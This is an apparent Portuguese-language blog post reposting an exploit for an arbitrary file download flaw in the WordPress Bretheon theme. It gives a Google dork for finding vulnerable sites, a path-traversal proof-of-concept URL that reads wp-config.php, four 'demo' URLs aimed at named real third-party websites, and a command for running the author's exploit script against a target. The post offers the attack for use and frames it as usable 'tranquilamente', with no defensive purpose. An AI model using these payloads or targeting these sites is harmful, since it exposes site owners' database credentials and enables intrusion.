Arbitrary File Download vulnerability o que eu chamo de A.F.D.
Foi encontrada tal falha no tema Bretheon do wordpress.
--------------------------------------------------------------------------------------------------------------
DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan
Tested on: Linux / Window
Google Dork: inurl:wp-content/themes/bretheon/
Demo
http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
PoC
http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------
Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img=" nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.
--------------------------------------------------------------------------------------------------------------
[TUTORIAL]:
https://www.youtube.com/watch?v=w6pxPR_s05w
TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------
Nenhum comentário:
Postar um comentário
............